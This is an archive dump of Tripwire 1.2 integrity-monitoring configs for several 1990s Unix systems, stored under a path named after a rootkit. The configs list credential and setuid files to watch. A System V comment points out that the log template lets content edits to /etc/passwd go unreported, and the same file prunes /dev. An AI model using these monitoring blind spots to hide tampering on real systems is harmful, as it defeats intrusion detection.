/lib R-2 /bin R-2 /usr/bin R-2 /usr/ucb R-2 /usr/lib R-2 /usr1/local R-2 /usr2/pics E =/usr L =/usr/spool L /usr/spool/cron L /usr/spool/mqueue L /usr/spool/mail L # You may or may not have the following #/usr/ftp L #/usr/ftp/bin R #/usr/ftp/etc R # put entries in for /var/yp if you need it # put entries for uucp if you need them # put entries for /var/adm if you need it =/tmp =/var/tmp # Here are entries for setuid/setgid files. On these, we use # both signatures just to be sure. # # You may want/need to edit this list. Batteries not inc. /admin N /bin/at R /bin/atq R /bin/atrm R #/bin/cancel R /bin/chfn R /bin/chsh R /bin/crontab R /bin/cu R /bin/df R /bin/iostat R /bin/ipcs R /bin/login R #/bin/lpstat R /bin/mail R /bin/newgrp R /bin/passwd R /bin/su R #/bin/sunview1/sv_acquire R #/bin/sunview1/sv_release R #/bin/sunview1/toolplaces R /bin/tip R /bin/uucp R /bin/uuname R /bin/uustat R /bin/uux R /bin/wall R /bin/write R #/bin/ypchfn R #/bin/ypchsh R /bin/yppasswd R /usr/bin/at R /usr/bin/atq R /usr/bin/atrm R #/usr/bin/cancel R /usr/bin/chfn R /usr/bin/chsh R /usr/bin/crontab R /usr/bin/cu R /usr/bin/df R /usr/bin/iostat R /usr/bin/ipcs R /usr/bin/login R #/usr/bin/lpstat R /usr/bin/mail R /usr/bin/newgrp R /usr/bin/passwd R /usr/bin/su R #/usr/bin/sunview1/sv_acquire R #/usr/bin/sunview1/sv_release R #/usr/bin/sunview1/toolplaces R /usr/bin/tip R /usr/bin/uucp R /usr/bin/uuname R /usr/bin/uustat R /usr/bin/uux R /usr/bin/wall R /usr/bin/write R #/usr/bin/ypchfn R #/usr/bin/ypchsh R /usr/bin/yppasswd R /usr/etc/arp R #/usr/etc/chill R #/usr/etc/devinfo R /usr/etc/dkinfo R /usr/etc/dmesg R /usr/etc/dump R /usr/etc/dumpfs R /usr/etc/keyenvoy R /usr/etc/kgmon R /usr/etc/lpc R /usr/etc/nfsstat R /usr/etc/ping R /usr/etc/rpc.rwalld R /usr/etc/trpt R /usr/ucb/lpq R /usr/ucb/lpr R /usr/ucb/netstat R /usr/ucb/rcp R /usr/ucb/rdist R /usr/ucb/rlogin R /usr/ucb/rsh R /usr/ucb/talk R /usr/ucb/vmstat R fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.hpux100600 764 764 3454 
5434607460 17230 0ustar dfdf# $Id: tw.conf.hpux,v 1.3 1993/08/19 05:27:12 genek Exp $ # # Lance R. Bailey # # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist /.exrc R # may not exist /.logout R # may not exist /.emacs R # may not exist /.forward R # may not exist /.netrc R # may not exist # Unix itself /hp-ux R /SYSBCKUP R # Now, some critical directories and files # Some exceptions are noted further down /etc R =/etc/conf =/etc/filesets =/etc/interface.lib =/etc/newconfig =/etc/oldconfig =/etc/update.lib =/etc/sm =/etc/sm.bak =/etc/rmfn.lib /etc/inetd.conf R /etc/rc R /etc/gettydefs R /etc/exports R /etc/motd L /etc/rmtab L /etc/utmp L /etc/group R # changes should be infrequent /etc/passwd L /dev L /usr/etc R # Checksumming the following is not so critical. However, # setuid/setgid files are special-cased further down. /lib R-2 /bin R-2 /usr/bin R-2 /usr/lib R-2 =/usr/lib/nls =/usr L =/usr/spool L /usr/spool/cron L /usr/spool/mqueue L /usr/mail L =/tmp =/usr/tmp # Here are entries for setuid/setgid files. On these, we use # both signatures just to be sure. # # You may want/need to edit this list. Batteries not inc. 
/bin/df R /bin/ipcs R /bin/login R /bin/mail R /bin/passwd R /bin/rmail R /bin/su R /bin/write R /etc/diskinfo R /etc/dmesg R /etc/dump R /etc/ping R /etc/wall R /usr/bin/at R /usr/bin/bdf R /usr/bin/cancel R /usr/bin/chfn R /usr/bin/chsh R /usr/bin/crontab R /usr/bin/cu R /usr/bin/iostat R /usr/bin/lpr R /usr/bin/lpstat R /usr/bin/mailx R /usr/bin/netstat R /usr/bin/rcp R /usr/bin/rlogin R /usr/bin/remsh R /usr/bin/uucp R /usr/bin/uuname R /usr/bin/uustat R /usr/bin/uux R /usr/bin/vmstat R /etc/arp R /usr/etc/nfsstat R /usr/etc/rpc.rwalld R fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.irix100600 764 764 14273 5620062021 17221 0ustar dfdfFrom rickert@cco.caltech.edu Sat Jul 30 11:17:32 1994 Received: from optima.CS.Arizona.EDU by quercus.cs.arizona.edu; Sat, 30 Jul 1994 11:17:31 MST Received: from piccolo.cco.caltech.edu by optima.cs.arizona.edu (5.65c/15) via SMTP id AA00375; Sat, 30 Jul 1994 11:17:29 MST Received: from accord.cco.caltech.edu by piccolo.cco.caltech.edu with ESMTP (8.6.7/DEI:4.41) id LAA28348; Sat, 30 Jul 1994 11:17:24 -0700 From: rickert@cco.caltech.edu (Keith Warren Rickert) Received: by accord.cco.caltech.edu (8.6.7/UGCS:4.41) id LAA04047; Sat, 30 Jul 1994 11:17:23 -0700 Date: Sat, 30 Jul 1994 11:17:23 -0700 Message-Id: <199407301817.LAA04047@accord.cco.caltech.edu> To: gkim@cs.arizona.edu Subject: Re: Status report #2: Tripwire v1.2 Status: OR I've checked out the Beta2 version of Tripwire 1.2, and had no problems at all under Irix 4.0.5, in both the tests and real use, including interactive database update. The following file is a tw.config which I think includes most of the important files for an Irix 4.0.x installation, although no guarantees for people with different software packages installed than I have. 
-------------------------------------------------------------------- # $Id: tw.conf.irix,v 1.1 1994/08/04 03:44:17 gkim Exp $ # # tripwire.config # Generic version for IRIX 4.x # Will need editing...see comments below # # This file contains a list of files and directories that System # Preener will scan. Information collected from these files will be # stored in the tripwire.database file. # # Format: [!|=] entry [ignore-flags] # # where: '!' signifies the entry is to be pruned (inclusive) from # the list of files to be scanned. # '=' signifies the entry is to be added, but if it is # a directory, then all its contents are pruned # (useful for /tmp). # # where: entry is the absolute pathname of a file or a directory # # where ignore-flags are in the format: # [template][ [+|-][pinugsam12] ... ] # # - : ignore the following atributes # + : do not ignore the following attributes # # p : permission and file mode bits a: access timestamp # i : inode number m: modification timestamp # n : number of links (ref count) c: inode creation timestamp # u : user id of owner 1: signature 1 # g : group id of owner 2: signature 2 # s : size of file # # # Ex: The following entry will scan all the files in /etc, and report # any changes in mode bits, inode number, reference count, uid, # gid, modification and creation timestamp, and the signatures. # However, it will ignore any changes in the access timestamp. # # /etc +pinugsm12-a # # The following templates have been pre-defined to make these long ignore # mask descriptions unecessary. # # Templates: (default) R : [R]ead-only (+pinugsm12-a) # L : [L]og file (+pinug-sam12) # N : ignore [N]othing (+pinusgsamc12) # E : ignore [E]verything (-pinusgsamc12) # # By default, Tripwire uses the R template -- it ignores # only the access timestamp. 
# # You can use templates with modifiers, like: # Ex: /etc/lp E+ug # # Example configuration file: # /etc R # all system files # !/etc/lp R # ...but not those logs # =/tmp N # just the directory, not its files # # Note the difference between pruning (via "!") and ignoring everything # (via "E" template): Ignoring everything in a directory still monitors # for added and deleted files. Pruning a directory will prevent Tripwire # from even looking in the specified directory. # # # Tripwire running slowly? Modify your tripwire.config entries to # ignore the (signature 2) attribute when this computationally-exorbitant # protection is not needed. (See README and design document for further # details.) # # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist /.exrc R # may not exist /.logout R # may not exist /.forward R # may not exist /.netrc R # may not exist # Unix itself /unix R # Now, some critical directories and files # Some exceptions are noted further down /etc R /etc/rc0.d R /etc/rc2.d R /etc/rc3.d R /etc/init.d R /etc/config R /etc/mtab L /etc/motd L /etc/rmtab L /etc/utmp L /etc/wtmp L /etc/OLDwtmp L /etc/xutmp L /etc/group R # changes should be infrequent # The next line may need to be replaced with /etc/security # if C2 is enabled /etc/passwd L /dev L /usr/etc R # Checksumming the following is not so critical. However, # setuid/setgid files are special-cased further down. /lib R-2 /bin R-2 /usr/bin R-2 /usr/sbin R-2 /usr/bsd R-2 /usr/lib R-2 /usr/adm L /usr/admin R /usr/bin/X11 R-2 =/usr L =/usr/spool L /usr/spool/cron L /usr/spool/mqueue L /usr/mail L # You may or may not have the following /usr/people/ftp L /usr/people/ftp/bin R /usr/people/ftp/etc R # put entries for uucp if you need them =/tmp =/usr/tmp # Here are entries for setuid/setgid files. On these, we use # both signatures just to be sure. # # You may want/need to edit this list. Batteries not inc. 
/usr/lib/sendmail R /usr/lib/acct/accton R /usr/lib/envm/longinfo R /usr/lib/sendmail.old R /usr/adm/mkpts R /usr/bin/at R /usr/bin/crontab R /usr/bin/X11/cdplayer R /usr/bin/X11/xterm R /usr/bin/X11/Xsgi R /usr/bin/cancel R /usr/bin/lp R /usr/bin/lpstat R /usr/bin/under R /usr/bsd/lpq R /usr/bsd/lpr R /usr/bsd/lprm R /usr/bsd/rcp R /usr/bsd/rdist R /usr/bsd/rlogin R /usr/bsd/rsh R /usr/etc/lpd R /usr/etc/ping R /usr/etc/route R /usr/etc/timedc R /usr/etc/traceroute R /usr/sbin/cdinstmgr R /usr/sbin/eject R /usr/sbin/gr_osview R /usr/sbin/gr_top R /usr/sbin/pandora R /usr/sbin/xwsh R /usr/sbin/systemdown R /usr/sbin/top R /usr/sbin/vadmin R /usr/demos/bin/setup_dgl R /bin/df R /bin/login R /bin/mail R /bin/newgrp R /bin/passwd R /bin/su R /etc/lvinfo R /etc/suid_exec R /usr/lib/expreserve R /usr/lib/sendmail R /usr/lib/sa/sadc R /usr/bin/X11/xload R /usr/bin/X11/xterm R /usr/bsd/lpq R /usr/bsd/lpr R /usr/bsd/lprm R /usr/bsd/w R /usr/etc/arp R /usr/etc/fam R /usr/etc/lpc R /usr/etc/lpd R /usr/etc/netstat R /usr/etc/nfsstat R /usr/etc/traceroute R /usr/sbin/Mail R /usr/sbin/osview R /usr/demos/bin/setup_dgl R /bin/ipcs R /bin/mail R /bin/ps R /bin/rmail R /etc/fuser R /etc/killall R /etc/savecore R /etc/whodo R -------------------------------------------------------------------- Regards, Keith fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.linux100600 764 764 465 5547660173 17367 0ustar dfdf# $Id: tw.conf.linux,v 1.1 1994/04/04 00:34:03 gkim Exp $ # # tripwire.config for linux mahcines # (minimal version) # # # Define a variable for searching /dev # @@define DEVSEARCH E+pinugsamc # # All Files # / R # # Except /proc # =/proc E # # And /dev # /dev @@DEVSEARCH # # just /tmp # =/tmp # # End # fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.next100600 764 764 5610 5434607461 17217 0ustar dfdf# $Id: tw.conf.next,v 1.3 1993/08/19 05:27:13 genek Exp $ # # Lance R. 
Bailey # # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist /.exrc R # may not exist /.logout R # may not exist /.emacs R # may not exist /.forward R # may not exist /.netrc R # may not exist # Unix itself /sdmach R # Now, some critical directories and files # Some exceptions are noted further down /etc R /etc/inetd.conf R /etc/rc R /etc/rc.boot R /etc/rc.local R /etc/rc.single R /etc/rc.ip R /etc/ttytab R /etc/exports R /etc/ttys L /etc/dumpdates L /etc/mtab L /etc/motd L /etc/rmtab L /etc/utmp L /etc/group R # changes should be infrequent # The next line may need to be replaced with /etc/security # if C2 is enabled /etc/passwd L /var L /dev L /usr/etc R # Checksumming the following is not so critical. However, # setuid/setgid files are special-cased further down. /lib R-2 /bin R-2 /usr/bin R-2 /usr/ucb R-2 /usr/lib R-2 =/usr L =/usr/spool L /usr/spool/cron L /usr/spool/mqueue L /usr/spool/mail L # You may or may not have the following #/usr/ftp L #/usr/ftp/bin R #/usr/ftp/etc R # put entries in for /var/yp if you need it # put entries for uucp if you need them # put entries for /var/adm if you need it =/tmp =/var/tmp # Here are entries for setuid/setgid files. On these, we use # both signatures just to be sure. # # You may want/need to edit this list. Batteries not inc. 
/bin/at R /bin/atq R /bin/atrm R /bin/cancel R /bin/chfn R /bin/chsh R /bin/crontab R /bin/cu R /bin/df R /bin/iostat R /bin/ipcs R /bin/login R /bin/lpstat R /bin/mail R /bin/newgrp R /bin/passwd R /bin/su R /bin/sunview1/sv_acquire R /bin/sunview1/sv_release R /bin/sunview1/toolplaces R /bin/tip R /bin/uucp R /bin/uuname R /bin/uustat R /bin/uux R /bin/wall R /bin/write R /bin/ypchfn R /bin/ypchsh R /bin/yppasswd R /usr/bin/at R /usr/bin/atq R /usr/bin/atrm R /usr/bin/cancel R /usr/bin/chfn R /usr/bin/chsh R /usr/bin/crontab R /usr/bin/cu R /usr/bin/df R /usr/bin/iostat R /usr/bin/ipcs R /usr/bin/login R /usr/bin/lpstat R /usr/bin/mail R /usr/bin/newgrp R /usr/bin/passwd R /usr/bin/su R /usr/bin/sunview1/sv_acquire R /usr/bin/sunview1/sv_release R /usr/bin/sunview1/toolplaces R /usr/bin/tip R /usr/bin/uucp R /usr/bin/uuname R /usr/bin/uustat R /usr/bin/uux R /usr/bin/wall R /usr/bin/write R /usr/bin/ypchfn R /usr/bin/ypchsh R /usr/bin/yppasswd R /usr/etc/arp R /usr/etc/chill R /usr/etc/devinfo R /usr/etc/dkinfo R /usr/etc/dmesg R /usr/etc/dump R /usr/etc/dumpfs R /usr/etc/keyenvoy R /usr/etc/kgmon R /usr/etc/lpc R /usr/etc/nfsstat R /usr/etc/ping R /usr/etc/rpc.rwalld R /usr/etc/trpt R /usr/ucb/lpq R /usr/ucb/lpr R /usr/ucb/netstat R /usr/ucb/rcp R /usr/ucb/rdist R /usr/ucb/rlogin R /usr/ucb/rsh R /usr/ucb/talk R /usr/ucb/vmstat R fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.s5100600 764 764 11263 5434607462 16612 0ustar dfdf# $Id: tw.conf.s5,v 1.3 1993/08/19 05:27:14 genek Exp $ # # # tripwire.config # Generic version for: # # SystemV/386 R3.2 configuration by W. Purvis # # This file contains a list of files and directories that System # Preener will scan. Information collected from these files will be # stored in the tripwire.database file. # # Format: [!|=] entry [ignore-flags] # # where: '!' signifies the entry is to be pruned (inclusive) from # the list of files to be scanned. 
# '=' signifies the entry is to be added, but if it is # a directory, then all its contents are pruned # (useful for /tmp). # # where: entry is the absolute pathname of a file or a directory # # where ignore-flags are in the format: # [template][ [+|-][pinugsam12] ... ] # # - : ignore the following atributes # + : do not ignore the following attributes # # p : permission and file mode bits a: access timestamp # i : inode number m: modification timestamp # n : number of links (ref count) c: inode creation timestamp # u : user id of owner 1: signature 1 # g : group id of owner 2: signature 2 # s : size of file # # # Ex: The following entry will scan all the files in /etc, and report # any changes in mode bits, inode number, reference count, uid, # gid, modification and creation timestamp, and the signatures. # However, it will ignore any changes in the access timestamp. # # /etc +pinugsm12-a # # The following templates have been pre-defined to make these long ignore # mask descriptions unecessary. # # Templates: (default) R : [R]ead-only (+pinugsm12-a) # L : [L]og file (+pinug-sam12) # N : ignore [N]othing (+pinusgsamc12) # E : ignore [E]verything (-pinusgsamc12) # # By default, Tripwire uses the R template -- it ignores # only the access timestamp. # # You can use templates with modifiers, like: # Ex: /etc/lp E+ug # # Example configuration file: # /etc R # all system files # !/etc/lp R # ...but not those logs # =/tmp N # just the directory, not its files # # Note the difference between pruning (via "!") and ignoring everything # (via "E" template): Ignoring everything in a directory still monitors # for added and deleted files. Pruning a directory will prevent Tripwire # from even looking in the specified directory. # # # Tripwire running slowly? Modify your tripwire.config entries to # ignore the (signature 2) attribute when this computationally-exorbitant # protection is not needed. (See README and design document for further # details.) 
#
# First, root's "home"
=/ L
/.rhosts R # may not exist
/.profile R # may not exist
/.cshrc R # may not exist
/.login R # may not exist
#/.exrc R # may not exist
# Unix itself
/unix R
# Now, some critical directories and files
# Some exceptions are noted further down
/etc R
/etc/inetd.conf R
/etc/rc R
/etc/rc.boot R
/etc/rc.local R
/etc/rc.single R
/etc/rc.ip R
/etc/ttytab R
/etc/exports R
/etc/ttys L
/etc/dumpdates L
/etc/mtab L
/etc/motd L
/etc/rmtab L
/etc/utmp L
/etc/group R # changes should be infrequent
# The next line may need to be replaced with /etc/security
# if C2 is enabled
# (The L template, +pinug-sam12, skips size, timestamps and both signatures,
# so an in-place edit of /etc/passwd that keeps its mode, inode, link count
# and ownership is not reported; use R if content changes must be flagged.)
/etc/passwd L
!/dev
/usr/etc R
/usr/local R
/usr/local/log L
# Checksumming the following is not so critical. However,
# setuid/setgid files are special-cased further down.
/lib R-2
/bin R-2
/usr/bin R-2
/usr/ucb R-2
/usr/lib R-2
/usr/local/lib/nqs/logfile L
=/usr L
=/usr/spool L
/usr/spool/cron L
/usr/spool/mqueue L
/usr/spool/mail L
=/usr/spool/nqs/private
=/usr/spool/nqs/times
# You may or may not have the following
#/usr/ftp L
#/usr/ftp/bin R
#/usr/ftp/etc R
# put entries in for /var/yp if you need it
# put entries for uucp if you need them
# put entries for /var/adm if you need it
=/tmp
# Here are entries for setuid/setgid files. On these, we use
# both signatures just to be sure.
#
# You may want/need to edit this list. Batteries not inc.
/bin/at R /bin/atq R /bin/atrm R /bin/cancel R /bin/chfn R /bin/chsh R /bin/crontab R /bin/cu R /bin/df R /bin/iostat R /bin/ipcs R /bin/login R /bin/lpstat R /bin/mail R /bin/newgrp R /bin/passwd R /bin/su R /bin/tip R #/bin/uucp R #/bin/uuname R #/bin/uustat R #/bin/uux R /bin/wall R /bin/write R /bin/ypchfn R /bin/ypchsh R /bin/yppasswd R /usr/bin/at R /usr/bin/atq R /usr/bin/atrm R /usr/bin/cancel R /usr/bin/chfn R /usr/bin/chsh R /usr/bin/crontab R /usr/bin/cu R /usr/bin/df R /usr/bin/iostat R /usr/bin/ipcs R /usr/bin/login R /usr/bin/lpstat R /usr/bin/mail R /usr/bin/newgrp R /usr/bin/passwd R /usr/bin/su R /usr/bin/tip R #/usr/bin/uucp R #/usr/bin/uuname R #/usr/bin/uustat R #/usr/bin/uux R /usr/bin/wall R /usr/bin/write R /usr/bin/ypchfn R /usr/bin/ypchsh R /usr/bin/yppasswd R fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.sun100600 764 764 10603 5503115202 17044 0ustar dfdf# $Id: tw.conf.sun,v 1.6 1993/12/13 16:38:26 genek Exp $ # # tripwire.config # Generic version for SunOS 4.x # Will need editing...see comments below # Modified by Rik Farrow, 11/28/93. # (You may want to disable signature 2 and enable signature 5 for # better performance.) 
# # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist /.exrc R # may not exist /.logout R # may not exist /.emacs R # may not exist /.forward R # may not exist /.netrc R # may not exist # GENE: A root user may have an .openwin-init, which is a shell script /.openwin-init L # this file is updated from a menu option # Unix itself /vmunix R # GENE: Other critical Sun files: boot, the boot program, and kadb /boot R /kadb R # Now, some critical directories and files # Some exceptions are noted further down /etc R /etc/inetd.conf R /etc/rc R /etc/rc.boot R /etc/rc.local R /etc/rc.single R /etc/rc.ip R /etc/ttytab R /etc/exports R /etc/ttys L /etc/dumpdates L /etc/mtab L /etc/motd L /etc/rmtab L /etc/utmp L /etc/group R # changes should be infrequent # The next line may need to be replaced with /etc/security # if C2 is enabled /etc/passwd L /var L /dev L /usr/etc R # GENE: /sbin contains binaries critical when in single user mode /sbin R # Checksumming the following is not so critical. However, # setuid/setgid files are special-cased further down. #/lib R-2 GENE: This is a symbolic link in 4.1.x #/bin R-2 GENE: This is a symbolic link in 4.1.x /usr/bin R /usr/ucb R # GENE: Other SunOS directories, including 5bin, which may be in PATH /usr/5bin R /usr/5lib R /usr/diag R /usr/kvm R /usr/lddrv R /usr/openwin/bin R /usr/openwin/lib R !/usr/openwin/lib/fonts /usr/xpg2bin R # GENE: End additions /usr/lib R # GENE: get rid of the fonts directories; perhaps could look only at dir perms !/usr/lib/fonts !/usr/lib/font !/usr/lib/fontinfo !/usr/lib/xglfonts !/usr/lib/vfont =/usr L =/usr/spool L # GENE: the real spool directory on Suns ... =/var/spool L /var/spool/cron L /var/spool/mqueue L /var/spool/mail L # GENE: additional spool directories in SunOS ... 
/var/spool/secretmail L =/var/spool/uucp L =/var/spool/lpd L # You may or may not have the following #/usr/ftp L #/usr/ftp/bin R #/usr/ftp/etc R # put entries in for /var/yp if you need it # put entries for uucp if you need them # put entries for /var/adm if you need it =/tmp =/var/tmp # Here are entries for setuid/setgid files. On these, we use # both signatures just to be sure. # # You may want/need to edit this list. Batteries not inc. # GENE: I replaced your list with a locally generated one. Your list # included files in /bin--which is a symbolic link to /usr/bin. Note # duplication of commmands in /bin and commands in /usr/bin in your original. # Also, you had missed any files in the optional Sys V compatibility # directories. /usr/5bin/su R /usr/bin/at R /usr/bin/atq R /usr/bin/atrm R /usr/bin/cancel R /usr/bin/chfn R /usr/bin/chsh R /usr/bin/crontab R /usr/bin/cu R /usr/bin/df R /usr/bin/fusage R /usr/bin/iostat R /usr/bin/ipcs R /usr/bin/login R /usr/bin/lpstat R /usr/bin/mail R /usr/bin/newgrp R /usr/bin/nsquery R /usr/bin/passwd R /usr/bin/su R /usr/bin/sunview1/sv_acquire R /usr/bin/sunview1/sv_release R /usr/bin/sunview1/toolplaces R /usr/bin/tip R /usr/bin/uucp R /usr/bin/uuname R /usr/bin/uustat R /usr/bin/uux R /usr/bin/wall R /usr/bin/write R /usr/bin/ypchfn R /usr/bin/ypchsh R /usr/bin/yppasswd R /usr/etc/arp R /usr/etc/auditd R /usr/etc/chill R /usr/etc/devinfo R /usr/etc/dkinfo R /usr/etc/dmesg R /usr/etc/dump R /usr/etc/dumpfs R /usr/etc/keyenvoy R /usr/etc/kgmon R /usr/etc/lpc R /usr/etc/nfsstat R /usr/etc/ping R /usr/etc/rfsetup R /usr/etc/shutdown R /usr/etc/trpt R /usr/games/chesstool R /usr/games/fortune R /usr/games/hack R /usr/games/robots R /usr/games/snake R /usr/kvm/getcons R /usr/kvm/ps R /usr/kvm/pstat R /usr/kvm/w R /usr/lib/acct/accton R /usr/lib/expreserve R /usr/lib/exrecover R /usr/lib/lpd R /usr/lib/sendmail R /usr/lib/sendmail.mx R /usr/lib/uucp/remote.unknown R /usr/lib/uucp/uucico R /usr/lib/uucp/uusched R 
/usr/lib/uucp/uuxqt R /usr/openwin/bin/loadmodule R /usr/openwin/bin/xload R /usr/openwin/lib/mkcookie R /usr/ucb/lpq R /usr/ucb/lpr R /usr/ucb/lprm R /usr/ucb/netstat R /usr/ucb/quota R /usr/ucb/rcp R /usr/ucb/rdist R /usr/ucb/rlogin R /usr/ucb/rsh R /usr/ucb/talk R /usr/ucb/vmstat R fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.sun.old100600 764 764 12357 5476717461 17661 0ustar dfdf# $Id: tw.conf.sun.old,v 1.1 1993/11/30 19:29:53 genek Exp $ # # tripwire.config # Generic version for SunOS 4.x # Will need editing...see comments below # # This file contains a list of files and directories that System # Preener will scan. Information collected from these files will be # stored in the tripwire.database file. # # Format: [!|=] entry [ignore-flags] # # where: '!' signifies the entry is to be pruned (inclusive) from # the list of files to be scanned. # '=' signifies the entry is to be added, but if it is # a directory, then all its contents are pruned # (useful for /tmp). # # where: entry is the absolute pathname of a file or a directory # # where ignore-flags are in the format: # [template][ [+|-][pinugsam12] ... ] # # - : ignore the following atributes # + : do not ignore the following attributes # # p : permission and file mode bits a: access timestamp # i : inode number m: modification timestamp # n : number of links (ref count) c: inode creation timestamp # u : user id of owner 1: signature 1 # g : group id of owner 2: signature 2 # s : size of file # # # Ex: The following entry will scan all the files in /etc, and report # any changes in mode bits, inode number, reference count, uid, # gid, modification and creation timestamp, and the signatures. # However, it will ignore any changes in the access timestamp. # # /etc +pinugsm12-a # # The following templates have been pre-defined to make these long ignore # mask descriptions unecessary. 
# # Templates: (default) R : [R]ead-only (+pinugsm12-a) # L : [L]og file (+pinug-sam12) # N : ignore [N]othing (+pinusgsamc12) # E : ignore [E]verything (-pinusgsamc12) # # By default, Tripwire uses the R template -- it ignores # only the access timestamp. # # You can use templates with modifiers, like: # Ex: /etc/lp E+ug # # Example configuration file: # /etc R # all system files # !/etc/lp R # ...but not those logs # =/tmp N # just the directory, not its files # # Note the difference between pruning (via "!") and ignoring everything # (via "E" template): Ignoring everything in a directory still monitors # for added and deleted files. Pruning a directory will prevent Tripwire # from even looking in the specified directory. # # # Tripwire running slowly? Modify your tripwire.config entries to # ignore the (signature 2) attribute when this computationally-exorbitant # protection is not needed. (See README and design document for further # details.) # # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist /.exrc R # may not exist /.logout R # may not exist /.emacs R # may not exist /.forward R # may not exist /.netrc R # may not exist # Unix itself /vmunix R # Now, some critical directories and files # Some exceptions are noted further down /etc R /etc/inetd.conf R /etc/rc R /etc/rc.boot R /etc/rc.local R /etc/rc.single R /etc/rc.ip R /etc/ttytab R /etc/exports R /etc/ttys L /etc/dumpdates L /etc/mtab L /etc/motd L /etc/rmtab L /etc/utmp L /etc/group R # changes should be infrequent # The next line may need to be replaced with /etc/security # if C2 is enabled /etc/passwd L /var L /dev L /usr/etc R # Checksumming the following is not so critical. However, # setuid/setgid files are special-cased further down. 
/lib R-2 /bin R-2 /usr/bin R-2 /usr/ucb R-2 /usr/lib R-2 =/usr L =/usr/spool L /usr/spool/cron L /usr/spool/mqueue L /usr/spool/mail L # You may or may not have the following #/usr/ftp L #/usr/ftp/bin R #/usr/ftp/etc R # put entries in for /var/yp if you need it # put entries for uucp if you need them # put entries for /var/adm if you need it =/tmp =/var/tmp # Here are entries for setuid/setgid files. On these, we use # both signatures just to be sure. # # You may want/need to edit this list. Batteries not inc. /bin/at R /bin/atq R /bin/atrm R /bin/cancel R /bin/chfn R /bin/chsh R /bin/crontab R /bin/cu R /bin/df R /bin/iostat R /bin/ipcs R /bin/login R /bin/lpstat R /bin/mail R /bin/newgrp R /bin/passwd R /bin/su R /bin/sunview1/sv_acquire R /bin/sunview1/sv_release R /bin/sunview1/toolplaces R /bin/tip R /bin/uucp R /bin/uuname R /bin/uustat R /bin/uux R /bin/wall R /bin/write R /bin/ypchfn R /bin/ypchsh R /bin/yppasswd R /usr/bin/at R /usr/bin/atq R /usr/bin/atrm R /usr/bin/cancel R /usr/bin/chfn R /usr/bin/chsh R /usr/bin/crontab R /usr/bin/cu R /usr/bin/df R /usr/bin/iostat R /usr/bin/ipcs R /usr/bin/login R /usr/bin/lpstat R /usr/bin/mail R /usr/bin/newgrp R /usr/bin/passwd R /usr/bin/su R /usr/bin/sunview1/sv_acquire R /usr/bin/sunview1/sv_release R /usr/bin/sunview1/toolplaces R /usr/bin/tip R /usr/bin/uucp R /usr/bin/uuname R /usr/bin/uustat R /usr/bin/uux R /usr/bin/wall R /usr/bin/write R /usr/bin/ypchfn R /usr/bin/ypchsh R /usr/bin/yppasswd R /usr/etc/arp R /usr/etc/chill R /usr/etc/devinfo R /usr/etc/dkinfo R /usr/etc/dmesg R /usr/etc/dump R /usr/etc/dumpfs R /usr/etc/keyenvoy R /usr/etc/kgmon R /usr/etc/lpc R /usr/etc/nfsstat R /usr/etc/ping R /usr/etc/rpc.rwalld R /usr/etc/trpt R /usr/ucb/lpq R /usr/ucb/lpr R /usr/ucb/netstat R /usr/ucb/rcp R /usr/ucb/rdist R /usr/ucb/rlogin R /usr/ucb/rsh R /usr/ucb/talk R /usr/ucb/vmstat R fbsdrootkit-1.2/tripwire-1.2/configs/tw.conf.sunos5100600 764 764 12037 5434607464 17521 0ustar dfdf# # tripwire.config # 
Generic version for SunOS 5.x (i.e, Solaris2.*) # Preliminary version by Bob Cunningham (bob@soest.hawaii.edu) 24June1993 # Will need editing...see comments below # # This file contains a list of files and directories that System # Preener will scan. Information collected from these files will be # stored in the tripwire.database file. # # Format: [!|=] entry [ignore-flags] # # where: '!' signifies the entry is to be pruned (inclusive) from # the list of files to be scanned. # '=' signifies the entry is to be added, but if it is # a directory, then all its contents are pruned # (useful for /tmp). # # where: entry is the absolute pathname of a file or a directory # # where ignore-flags are in the format: # [template][ [+|-][pinugsam12] ... ] # # - : ignore the following atributes # + : do not ignore the following attributes # # p : permission and file mode bits a: access timestamp # i : inode number m: modification timestamp # n : number of links (ref count) c: inode creation timestamp # u : user id of owner 1: signature 1 # g : group id of owner 2: signature 2 # s : size of file # # # Ex: The following entry will scan all the files in /etc, and report # any changes in mode bits, inode number, reference count, uid, # gid, modification and creation timestamp, and the signatures. # However, it will ignore any changes in the access timestamp. # # /etc +pinugsm12-a # # The following templates have been pre-defined to make these long ignore # mask descriptions unecessary. # # Templates: (default) R : [R]ead-only (+pinugsm12-a) # L : [L]og file (+pinug-sam12) # N : ignore [N]othing (+pinusgsamc12) # E : ignore [E]verything (-pinusgsamc12) # # By default, Tripwire uses the R template -- it ignores # only the access timestamp. 
# # You can use templates with modifiers, like: # Ex: /etc/lp E+ug # # Example configuration file: # /etc R # all system files # !/etc/lp R # ...but not those logs # =/tmp N # just the directory, not its files # # Note the difference between pruning (via "!") and ignoring everything # (via "E" template): Ignoring everything in a directory still monitors # for added and deleted files. Pruning a directory will prevent Tripwire # from even looking in the specified directory. # # # Tripwire running slowly? Modify your tripwire.config entries to # ignore the (signature 2) attribute when this computationally-exorbitant # protection is not needed. (See README and design document for further # details.) # # First, root's "home" =/ L /.rhosts R # may not exist /.profile R # may not exist /.cshrc R # may not exist /.login R # may not exist #/.exrc R # may not exist /.logout R # may not exist #/.emacs R # may not exist /.forward R # may not exist /.netrc R # may not exist #/.mailrc R # may not exist # Unix itself /kernel/unix R # Now, some critical directories and files # Some exceptions are noted further down /dev L /devices L =/devices/pseudo L /etc R /etc/default R /etc/dfs/dfstab R /etc/dfs/sharetab R /etc/dumpdates L /etc/group R # changes should be infrequent /etc/hosts.equiv R /etc/inet/inetd.conf R /etc/inet/protocols R /etc/inet/services R /etc/init.d R /etc/motd L 